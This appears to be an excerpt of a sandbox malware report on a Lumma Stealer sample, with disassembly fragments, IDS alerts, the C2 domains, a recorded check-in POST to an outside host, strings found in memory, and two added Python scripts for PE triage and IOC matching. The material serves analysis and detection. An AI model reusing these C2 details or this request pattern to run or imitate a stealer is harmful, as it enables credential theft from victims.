      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then mov esi, eax0_2_00725C41
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then mov eax, dword ptr [esp+00000080h]0_2_00727C28
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then xor edi, edi0_2_00727C28
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then push ebx0_2_0074CCFA
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then mov byte ptr [edi], cl0_2_0073CCB0
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then mov byte ptr [esi], al0_2_0073DCBC
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then mov byte ptr [edi], cl0_2_0073CD78
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then mov byte ptr [edi], cl0_2_0073CD37
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then push esi0_2_00737D1A
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then mov word ptr [eax], cx0_2_00738DC8
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then mov byte ptr [edi], cl0_2_0073CD89
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then mov ebx, eax0_2_0071DE40
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then mov ebx, eax0_2_0071DE40
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then cmp dword ptr [ebp+edi*8+00h], AF697AECh0_2_00724E96
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then cmp al, 2Eh0_2_00736E96
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then cmp dword ptr [ebp+edi*8+00h], E785F9BAh0_2_00724E87
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then push 00000000h0_2_00739F40
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+18h]0_2_00726F35
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then movzx ebx, byte ptr [esp+ecx-75h]0_2_00726F35
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+68E75405h]0_2_0074EF07
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then mov ecx, eax0_2_00725FD3
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 4x nop then mov eax, dword ptr [ebp-68h]0_2_00738FA0
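The static PE flags reported under Compliance (RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE) and the unpack detections (section rights changed, PE header overwritten, unpacked image dumped at 0x400000) are the first things a reverser checks on disk: with relocations stripped and no dynamic-base flag the image always maps at its preferred ImageBase, which is why the dump sits at 0x400000 and why a W+X or data-less section is a reliable unpack target. The following is an added example, not Joe Sandbox code: a standard-library PE header parser that reports those flags and the packer hints that go with them. The PE it parses is built by build_test_pe() and is constructed for the example; it is not the analysed sample, and the flag values it is given only mirror the ones the report lists.

```python
"""Static PE triage with the standard library: COFF characteristics,
DllCharacteristics, ImageBase and section-table checks. Added example,
not Joe Sandbox code; build_test_pe() constructs a minimal header, it is
not the analysed binary.
"""
import struct

# IMAGE_FILE_HEADER.Characteristics (winnt.h)
FILE_CHARACTERISTICS = {
    0x0001: "RELOCS_STRIPPED",
    0x0002: "EXECUTABLE_IMAGE",
    0x0020: "LARGE_ADDRESS_AWARE",
    0x0100: "32BIT_MACHINE",
    0x2000: "DLL",
}
# IMAGE_OPTIONAL_HEADER.DllCharacteristics
DLL_DYNAMIC_BASE = 0x0040
DLL_NX_COMPAT = 0x0100
# IMAGE_SECTION_HEADER.Characteristics
SCN_CNT_CODE = 0x00000020
SCN_MEM_EXECUTE = 0x20000000
SCN_MEM_READ = 0x40000000
SCN_MEM_WRITE = 0x80000000


def parse_pe(data: bytes) -> dict:
    """Walk DOS header -> PE signature -> COFF header -> optional header -> sections."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ header")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    fh = e_lfanew + 4
    machine, nsec, _ts, _sym, _nsym, opt_size, chars = struct.unpack_from("<HHIIIHH", data, fh)
    opt = fh + 20
    magic = struct.unpack_from("<H", data, opt)[0]
    if magic == 0x10B:                                   # PE32: ImageBase is a DWORD at +28
        image_base = struct.unpack_from("<I", data, opt + 28)[0]
    elif magic == 0x20B:                                 # PE32+: ImageBase is a QWORD at +24
        image_base = struct.unpack_from("<Q", data, opt + 24)[0]
    else:
        raise ValueError(f"unknown optional header magic 0x{magic:x}")
    dll_chars = struct.unpack_from("<H", data, opt + 70)[0]   # same offset in PE32 and PE32+
    sections = []
    for i in range(nsec):
        name, vsize, va, rawsize, rawptr, _r, _l, _nr, _nl, schars = struct.unpack_from(
            "<8sIIIIIIHHI", data, opt + opt_size + 40 * i)
        sections.append({"name": name.rstrip(b"\0").decode("ascii", "replace"),
                         "virtual_size": vsize, "virtual_address": va,
                         "raw_size": rawsize, "raw_pointer": rawptr,
                         "characteristics": schars})
    return {"machine": machine, "characteristics": chars, "image_base": image_base,
            "dll_characteristics": dll_chars, "sections": sections}


def triage(data: bytes) -> list[str]:
    """Human-readable findings: the sandbox's static flags plus packer hints."""
    pe = parse_pe(data)
    findings = [name for bit, name in FILE_CHARACTERISTICS.items() if pe["characteristics"] & bit]
    if pe["characteristics"] & 0x0001 and not pe["dll_characteristics"] & DLL_DYNAMIC_BASE:
        findings.append(f"no ASLR: relocations stripped, always maps at 0x{pe['image_base']:X}")
    if not pe["dll_characteristics"] & DLL_NX_COMPAT:
        findings.append("no NX_COMPAT: data pages may be executable")
    for s in pe["sections"]:
        c = s["characteristics"]
        if c & SCN_MEM_WRITE and c & SCN_MEM_EXECUTE:
            findings.append(f"section {s['name']} is writable and executable")
        if s["raw_size"] == 0 and s["virtual_size"] > 0:
            findings.append(f"section {s['name']} has no file data but 0x{s['virtual_size']:X} "
                            "bytes in memory (unpack target)")
    return findings


def build_test_pe(characteristics=0x0103, dll_characteristics=0x0000,
                  image_base=0x400000, sections=None) -> bytes:
    """Constructed minimal PE32 header for this example (headers only, no code)."""
    if sections is None:
        sections = [
            (b".text", 0x1000, 0x1000, 0x1000, 0x400, SCN_CNT_CODE | SCN_MEM_EXECUTE | SCN_MEM_READ),
            (b".data", 0x2000, 0x2000, 0x0, 0x0, SCN_MEM_READ | SCN_MEM_WRITE),
        ]
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", 0x40)      # e_lfanew = 0x40
    opt_size = 0xE0
    file_hdr = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, opt_size, characteristics)
    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0, 0x10B)                # PE32 magic
    struct.pack_into("<I", opt, 28, image_base)
    struct.pack_into("<I", opt, 32, 0x1000)              # SectionAlignment
    struct.pack_into("<I", opt, 36, 0x200)               # FileAlignment
    struct.pack_into("<H", opt, 68, 2)                   # Subsystem: WINDOWS_GUI
    struct.pack_into("<H", opt, 70, dll_characteristics)
    sec_tbl = b"".join(struct.pack("<8sIIIIIIHHI", n, vs, va, rs, rp, 0, 0, 0, 0, ch)
                       for n, vs, va, rs, rp, ch in sections)
    return dos + b"PE\0\0" + file_hdr + bytes(opt) + sec_tbl


if __name__ == "__main__":
    for line in triage(build_test_pe()):
        print(line)
```

On a real file, replace build_test_pe() with the bytes read from disk; the parser stops at the section table, so it is safe to point at untrusted samples. A clean static header does not clear a sample: this report's unpacking happened by changing section rights at runtime, which is why the RWX evidence is in the memory dumps rather than in the on-disk section table.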

      Networking

      Source: Network trafficSuricata IDS: 2058360 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (discokeyus .lat) : 192.168.2.9:62547 -> 1.1.1.1:53
      Source: Network trafficSuricata IDS: 2058362 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (energyaffai .lat) : 192.168.2.9:57145 -> 1.1.1.1:53
      Source: Network trafficSuricata IDS: 2058358 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (crosshuaht .lat) : 192.168.2.9:62535 -> 1.1.1.1:53
      Source: Network trafficSuricata IDS: 2058376 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sustainskelet .lat) : 192.168.2.9:63913 -> 1.1.1.1:53
      Source: Network trafficSuricata IDS: 2058354 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (aspecteirs .lat) : 192.168.2.9:55219 -> 1.1.1.1:53
      Source: Network trafficSuricata IDS: 2058370 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (necklacebudi .lat) : 192.168.2.9:54275 -> 1.1.1.1:53
      Source: Network trafficSuricata IDS: 2058378 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sweepyribs .lat) : 192.168.2.9:57293 -> 1.1.1.1:53
      Source: Network trafficSuricata IDS: 2058364 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (grannyejh .lat) : 192.168.2.9:49807 -> 1.1.1.1:53
      Source: Network trafficSuricata IDS: 2058374 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (rapeflowwj .lat) : 192.168.2.9:63618 -> 1.1.1.1:53
      Source: Network trafficSuricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.9:49722 -> 23.55.153.106:443
      Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.9:49733 -> 172.67.157.254:443
      Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.9:49733 -> 172.67.157.254:443
      Source: Malware configuration extractorURLs: energyaffai.lat
      Source: Malware configuration extractorURLs: grannyejh.lat
      Source: Malware configuration extractorURLs: aspecteirs.lat
      Source: Malware configuration extractorURLs: discokeyus.lat
      Source: Malware configuration extractorURLs: necklacebudi.lat
      Source: Malware configuration extractorURLs: rapeflowwj.lat
      Source: Malware configuration extractorURLs: sweepyribs.lat
      Source: Malware configuration extractorURLs: sustainskelet.lat
      Source: Malware configuration extractorURLs: crosshuaht.lat
      Source: Joe Sandbox ViewIP Address: 172.67.157.254
      Source: Joe Sandbox ViewIP Address: 23.55.153.106
      Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49722 -> 23.55.153.106:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49733 -> 172.67.157.254:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49739 -> 172.67.157.254:443
      Source: global trafficHTTP traffic detected:
          GET /profiles/76561199724331900 HTTP/1.1
          Connection: Keep-Alive
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
          Host: steamcommunity.com
      Source: global trafficHTTP traffic detected:
          POST /api HTTP/1.1
          Connection: Keep-Alive
          Content-Type: application/x-www-form-urlencoded
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
          Content-Length: 8
          Host: lev-tolstoi.com
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1 (11 occurrences)
      Source: NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: heckout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com " equals www.youtube.com (Youtube)
      Source: NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: ic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; con equals www.youtube.com (Youtube)
      Source: global traffic | DNS traffic detected: DNS query: sweepyribs.lat
      Source: global traffic | DNS traffic detected: DNS query: grannyejh.lat
      Source: global traffic | DNS traffic detected: DNS query: discokeyus.lat
      Source: global traffic | DNS traffic detected: DNS query: necklacebudi.lat
      Source: global traffic | DNS traffic detected: DNS query: energyaffai.lat
      Source: global traffic | DNS traffic detected: DNS query: aspecteirs.lat
      Source: global traffic | DNS traffic detected: DNS query: sustainskelet.lat
      Source: global traffic | DNS traffic detected: DNS query: crosshuaht.lat
      Source: global traffic | DNS traffic detected: DNS query: rapeflowwj.lat
      Source: global traffic | DNS traffic detected: DNS query: steamcommunity.com
      Source: global traffic | DNS traffic detected: DNS query: lev-tolstoi.com
      Source: unknown | HTTP traffic detected:
          POST /api HTTP/1.1
          Connection: Keep-Alive
          Content-Type: application/x-www-form-urlencoded
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
          Content-Length: 8
          Host: lev-tolstoi.com
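The network findings above form one chain: the .lat names are the C2 list carried in the sample's configuration and were resolved one after another; the GET of a Steam profile followed by a DNS lookup for a name that is in neither the config nor the earlier queries (lev-tolstoi.com) and an 8-byte form POST to /api on it is the dead-drop pattern this family is known for, with the Steam page serving only as a lookup step. Two caveats a responder needs before turning these into blocks: 172.67.157.254 and 23.55.153.106 sit in Cloudflare and Akamai edge ranges, so they are shared CDN addresses rather than attacker-owned hosts, and the JA3 hash is one Emerging Threats rates only as "Possible Malware" at severity 3. The script below is an added example, not part of the Joe Sandbox report or any vendor tooling. It turns the indicators listed above into sets, shows which resolved names the extracted config (as shown in this excerpt) does not list, parses the raw check-in request as printed above and tests it against a shape-based rule that keys on the Host header rather than on a fixed domain, and runs all of it over a few constructed log lines. The key=value log format, the 10.0.0.x addresses and the threshold of 32 bytes on the body are assumptions for the example.

```python
import re
from typing import Dict, Iterable, List, Set, Tuple

# Indicators copied from the report's network findings. The config list is what
# this excerpt shows; the full report may carry more entries.
CONFIG_C2: Set[str] = {"discokeyus.lat", "necklacebudi.lat", "rapeflowwj.lat",
                       "sweepyribs.lat", "sustainskelet.lat", "crosshuaht.lat"}
DNS_QUERIED: Set[str] = {"sweepyribs.lat", "grannyejh.lat", "discokeyus.lat",
                         "necklacebudi.lat", "energyaffai.lat", "aspecteirs.lat",
                         "sustainskelet.lat", "crosshuaht.lat", "rapeflowwj.lat",
                         "steamcommunity.com", "lev-tolstoi.com"}
CONTACTED_IPS: Set[str] = {"172.67.157.254", "23.55.153.106"}   # CDN edges: weak on their own
JA3_SEEN: Set[str] = {"a0e9f5d64349fb13191bc781f81f42e1"}       # shared fingerprint: weak on its own
# Legitimate service the sample fetched on the way to its C2. Matching it would page on
# every Steam user, so it is left out of domain matching.
DEAD_DROP_HOSTS: Set[str] = {"steamcommunity.com"}


def queried_but_not_in_config(config: Set[str], queried: Set[str]) -> Set[str]:
    """Names the sample resolved that the extracted config did not list."""
    return {d for d in queried if d not in config}


def parse_http_request(raw: str) -> Tuple[str, str, Dict[str, str]]:
    """Split a raw request, one header per line as printed in the report, into
    (method, path, {lower-case header name: value})."""
    lines = raw.strip().splitlines()
    method, path, _version = lines[0].split(" ", 2)
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers


def is_checkin_shape(raw: str, trusted_hosts: Set[str] = frozenset()) -> bool:
    """The check-in shape in the report: POST /api, form-encoded, a body of a few
    bytes, no Referer or Origin (a browser form post carries them), to a host that
    is not known-good. The Host header is the C2 of the day, so it is reported, not
    hard-coded. The 32-byte ceiling is an assumption for the example."""
    method, path, h = parse_http_request(raw)
    try:
        length = int(h.get("content-length", "0"))
    except ValueError:
        return False
    return (method == "POST" and path == "/api"
            and h.get("content-type", "").startswith("application/x-www-form-urlencoded")
            and 0 < length <= 32
            and "referer" not in h and "origin" not in h
            and h.get("host", "") not in trusted_hosts)


# Constructed key=value log format for the example; adapt the regex to your own source.
LOG_FIELD = re.compile(r"\b(?P<key>qname|sni|dst|ja3)=(?P<val>\S+)")


def match_log_lines(lines: Iterable[str]) -> List[Tuple[str, str, str]]:
    """Return (indicator type, indicator, line) for every field that hits an IOC."""
    domains = (CONFIG_C2 | DNS_QUERIED) - DEAD_DROP_HOSTS
    hits: List[Tuple[str, str, str]] = []
    for line in lines:
        for m in LOG_FIELD.finditer(line):
            key, val = m.group("key"), m.group("val").rstrip(".")
            if key in ("qname", "sni") and val in domains:
                hits.append(("domain", val, line))
            elif key == "dst" and val in CONTACTED_IPS:
                hits.append(("ip", val, line))
            elif key == "ja3" and val in JA3_SEEN:
                hits.append(("ja3", val, line))
    return hits


# The check-in request exactly as the report prints it.
CHECKIN_REQUEST = """POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: lev-tolstoi.com"""

# Constructed log lines, not taken from the report.
SAMPLE_LOGS = [
    "2024-12-20T10:01:02Z dns src=10.0.0.7 qname=sweepyribs.lat. rcode=NXDOMAIN",
    "2024-12-20T10:01:03Z dns src=10.0.0.7 qname=steamcommunity.com. rcode=NOERROR",
    "2024-12-20T10:01:04Z tls src=10.0.0.7 dst=172.67.157.254 sni=lev-tolstoi.com ja3=a0e9f5d64349fb13191bc781f81f42e1",
    "2024-12-20T10:05:00Z dns src=10.0.0.9 qname=www.example.com. rcode=NOERROR",
]

if __name__ == "__main__":
    print("resolved but not in extracted config:",
          sorted(queried_but_not_in_config(CONFIG_C2, DNS_QUERIED)))
    print("check-in shape:", is_checkin_shape(CHECKIN_REQUEST))
    for kind, ioc, line in match_log_lines(SAMPLE_LOGS):
        print(f"{kind:6} {ioc:34} {line}")
```

Treat the domain hits as the actionable ones. An IP or JA3 hit on its own only says "something reached a CDN edge with a WinHTTP-like TLS stack"; it becomes interesting when it coincides with a domain hit or with the POST shape on the same source address within the same minute, which is how the report itself ties the three together.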
      Source: NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://127.0.0.1:27060
      Source: NQbg5Ht2hW.exe, 00000000.00000002.1716952832.00000000006D6000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444874751.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1452976890.00000000006D3000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1445042582.0000000000647000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444948353.00000000006E8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
      Source: NQbg5Ht2hW.exe, 00000000.00000002.1716952832.00000000006D6000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444874751.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1452976890.00000000006D3000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1445042582.0000000000647000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444948353.00000000006E8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://store.steampowered.com/privacy_agreement/
      Source: NQbg5Ht2hW.exe, 00000000.00000002.1716952832.00000000006D6000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444874751.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1452976890.00000000006D3000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1445042582.0000000000647000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444948353.00000000006E8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://store.steampowered.com/subscriber_agreement/
      Source: Amcache.hve.4.dr | String found in binary or memory: http://upx.sf.net
      Source: NQbg5Ht2hW.exe, 00000000.00000002.1716952832.00000000006D6000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444874751.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1452976890.00000000006D3000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.valvesoftware.com/legal.htm
      Source: NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://api.steampowered.com/
      Source: NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://avatars.fastly.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
      Source: NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://cdn.fastly.steamstatic.c
      Source: NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://checkout.steampowered.com/
      Source: NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fast
      Source: NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.s
      Source: NQbg5Ht2hW.exe, 00000000.00000002.1716952832.00000000006D6000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1452976890.00000000006D3000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamst
      Source: NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamsta
      Source: NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/
      Source: NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/publ2
      Source: NQbg5Ht2hW.exe, 00000000.00000002.1716952832.00000000006D6000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444874751.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1452976890.00000000006D3000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1445042582.0000000000647000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/css/applications/community/main.css?v=Lj6X7NKUMfzk&a
      Source: NQbg5Ht2hW.exe, 00000000.00000002.1716952832.00000000006D6000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444874751.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1452976890.00000000006D3000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/css/globalv2.css?v=hzEgqbtRcI5V&l=english&_c
      Source: NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/css/globalv2.css?v=hzEgqbtRcI5V&lB
      Source: NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/css/promo/summer2017
      Source: NQbg5Ht2hW.exe, 00000000.00000002.1716952832.00000000006D6000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444874751.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1452976890.00000000006D3000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/css/promo/summer2017/stickers.css?v=Ncr6N09yZIap&amp
      Source: NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/css/skinR
      Source: NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&l=english&a
      Source: NQbg5Ht2hW.exe, 00000000.00000002.1716952832.00000000006D6000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444874751.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1452976890.00000000006D3000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&l=eng
      Source: NQbg5Ht2hW.exe, 00000000.00000002.1716952832.00000000006D6000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444874751.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1452976890.00000000006D3000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.css?v=fe66ET2uI50l&l=englis
      Source: NQbg5Ht2hW.exe, 00000000.00000002.1716952832.00000000006D6000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444874751.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1452976890.00000000006D3000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1445042582.0000000000647000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
      Source: NQbg5Ht2hW.exe, 00000000.00000002.1716952832.00000000006D6000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444874751.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1452976890.00000000006D3000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444948353.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000002.1716705757.000000000063A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
